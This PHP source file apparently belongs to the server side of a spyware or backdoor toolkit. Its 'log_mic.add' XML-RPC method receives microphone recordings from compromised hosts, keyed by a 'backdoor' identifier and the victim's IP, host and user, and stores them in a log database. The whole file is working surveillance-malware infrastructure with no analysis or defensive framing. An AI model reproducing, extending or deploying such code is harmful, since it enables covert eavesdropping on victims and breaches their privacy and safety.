<?php

//////////
///
///   log_mic.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_SERV) {
   $dm['log_mic.add']                 ['function'] = 'log_mic_add';
//   $dm['log_mic.add']                ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                                  $xmlrpcString,     // $backdoor
//                                                                  $xmlrpcString,     // $remoteip
//                                                                  $xmlrpcString,     // $remotehost
//                                                                  $xmlrpcString,     // $remoteuser
//                                                                  $xmlrpcArray));    // $logarray
}



/***************\
*   FUNCTIONS   *
\***************/

function log_mic_add($backdoor, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= ['[microphone]']
   // varchar2  <= ['MIC']
   // varchar3  <= -
   // int1      <= [duration(content)]
   // int2      <= [sizeof(content)]
   // int3      <= -
   // longtext1 <= -
   // longblob1 <= content

   foreach($logarray as &$log) {
      if(isset($log['contentfile']) && isset($_SESSION['upload'][$log['contentfile']])) {
         clearstatcache();
         $log['_content'] = file_get_contents(sys_get_temp_dir().'/'.$log['contentfile']);
         $log['size'] = filesize(sys_get_temp_dir().'/'.$log['contentfile']);
         unlink(sys_get_temp_dir().'/'.$log['contentfile']);
         unset($_SESSION['upload'][$log['contentfile']]);
         $log['duration'] = strlen($log['_content']) * 8 / 131072;
      } else {
         $log['content'] = $log['content']->scalar;
         $log['size'] = strlen($log['content']);
         $log['duration'] = strlen($log['content']) * 8 / 131072;
      }
   }
   unset($log);

   $ret = db_escape(array(&$backdoor,
                          &$remoteip,
                          &$remotehost,
                          &$remoteuser,
                          &$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }

   $backdoor_id = $ret[0]->backdoor_id;

   foreach($logarray as $log) {
      if(isset($log['_content'])) {
         $ret = db_escape_file($log['_content']);
         if(is_object($ret)) {
            return $ret;
         }
         $log['content'] = &$log['_content'];
      }

      $sql  = "INSERT INTO `log` (`backdoor_id`, ";
      $sql .=                    "`type`, ";
      $sql .=                    "`remoteip`, ";
      $sql .=                    "`remotehost`, ";
      $sql .=                    "`remoteuser`, ";
      $sql .=                    "`received`, ";
      $sql .=                    "`acquired`, ";
      $sql .=                    "`varchar1`, ";
      $sql .=                    "`varchar2`, ";
      $sql .=                    "`int1`, ";
      $sql .=                    "`int2`, ";
      $sql .=                    "`longblob1`) ";
      $sql .= "VALUES ('$backdoor_id', ";
      $sql .=         "'VOIP', ";
      $sql .=         "'$remoteip', ";
      $sql .=         "'$remotehost', ";
      $sql .=         "'$remoteuser', ";
      $sql .=         "UTC_TIMESTAMP(), ";
      $sql .=         "'".str_replace(':', '', $log['acquired']->scalar)."', ";
      $sql .=         "'[microphone]', ";
      $sql .=         "'MIC', ";
      $sql .=         $log['duration'].", ";
      $sql .=         $log['size'].", ";
      $sql .=         "'";
      $sql .=           $log['content'];
      $sql .=         "')";

      $log = false;

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      }
   }

   return true;
}

?>
